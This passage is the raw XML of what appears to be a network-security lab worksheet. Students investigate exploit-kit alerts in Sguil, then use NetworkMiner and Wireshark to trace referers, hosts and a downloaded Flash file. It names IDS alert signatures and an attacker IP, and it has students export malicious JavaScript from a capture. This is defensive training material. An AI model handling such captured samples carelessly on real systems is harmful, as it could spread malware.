        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5486400" cy="1619885"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8" name="Picture 9" descr="screenshot of sguil alert id 5.2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screenshot of sguil alert id 5.2  highlighted"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId22"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5486400" cy="16198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127.55pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId22" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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What are the referer and host websites that are involved in the first SRC event? What do you think the user did to generate this alert?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(source IP address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Transcript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to open a transcript of the conversation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5486400" cy="1765300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9" name="Picture 16" descr="screenshot of sguil alert id 5.24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screenshot of sguil alert id 5.24 highlighted"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId23"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5486400" cy="1765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139.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId23" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Refer to the transcript and answer the following questions:</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What kind of request was involved?</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Were any files requested?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the URL for the referer and the host website?</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How the content encoded?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close the current transcript window. In the Sguil window, right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">transcript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. According to the information in the transcript answer the following questions:</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How many requests and responses were involved in this alert?</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was the first request?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Who was the referrer?</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Who was the host server request to?</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Was the response encoded?</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was the second request?</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Who was the host server request to?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Was the response encoded?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was the third request?</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Who was the referrer?</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was the Content-Type of the third response?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What were the first 3 characters of the data in the response?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The data starts after the last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DST:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entry.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="0" w:name="_Hlk42787138"/>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CWS is a file signature. File signatures help identify the type of file that is represented different types of data. Go to the following website </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="https://en.wikipedia.org/wiki/List_of_file_signatures" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="1144"/>
          </w:rPr>
          <w:t xml:space="preserve">https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1144"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use Ctrl-F to open a find box. Search for this file signature to find out what type of file was downloaded in the data.</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What type of file was downloaded? What application uses this type of file?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close the transcript window.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click the same ID again and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Miner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab.</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How many files are there and what is the file types?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1101"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Wireshark to Investigate an Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Part 3, you will pivot to Wireshark to closely examine the details of the attack.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pivot to Wireshark and Change Settings.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Sguil, right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and pivot to select Wireshark from the menu. The pcap that is associated with this alert will open in Wireshark.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The default Wireshark setting uses a relative time per-packet which is not very helpful for isolating the exact time an event occurred. To fix this, select to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">View &gt; Time Display Format &gt; Date and Time of Day</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and then repeat a second time, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">View &gt; Time Display Format &gt; Seconds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Now your Wireshark Time column has the date and timestamps. Resize the columns to make the display clearer if necessary.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3790950" cy="1600835"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="10" name="Picture 28" descr="screenshot of wireshark with the first entry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8" descr="screenshot of wireshark with the first entry highlighted"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId25"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3790949" cy="1600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98.50pt;height:126.05pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId25" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Investigate HTTP Traffic.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Wireshark, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">display filter to filter for web requests only.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5260340" cy="958850"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="11" name="Picture 18" descr="screenshot of wireshark with the first entry highlighted and http.request fil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descr="screenshot of wireshark with the first entry highlighted and http.request filtered"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId26"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5260340" cy="95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4.20pt;height:75.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId26" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer data.</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What website directed the user to the www.homeimprovement.com website?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View HTTP Objects.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Wireshark, choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the Export HTTP objects list window, select the remodeling-your-kitchen-cabinets.html packet and save it to your home folder.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close Wireshark. In Sguil, right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(source IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">display filter and answer the following questions:</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What is the http request for?</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the host server? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and save the JavaScript file to your home folder.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close Wireshark. In Sguil, right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.25 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">display filter. Notice that this alert corresponds to the three GET, POST, and GET requests that we looked at earlier.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the first packet selected, in the packet details area, expand the Hypertext Transfer Protocol application layer data. Right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Host information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Apply as Column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to add the Host information to the packet list columns, as shown in the figure.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4241800" cy="2859405"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="12" name="Picture 42" descr="screenshot of wireshark with with apply as colum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2" descr="screenshot of wireshark with with apply as column highlighted"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId27"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
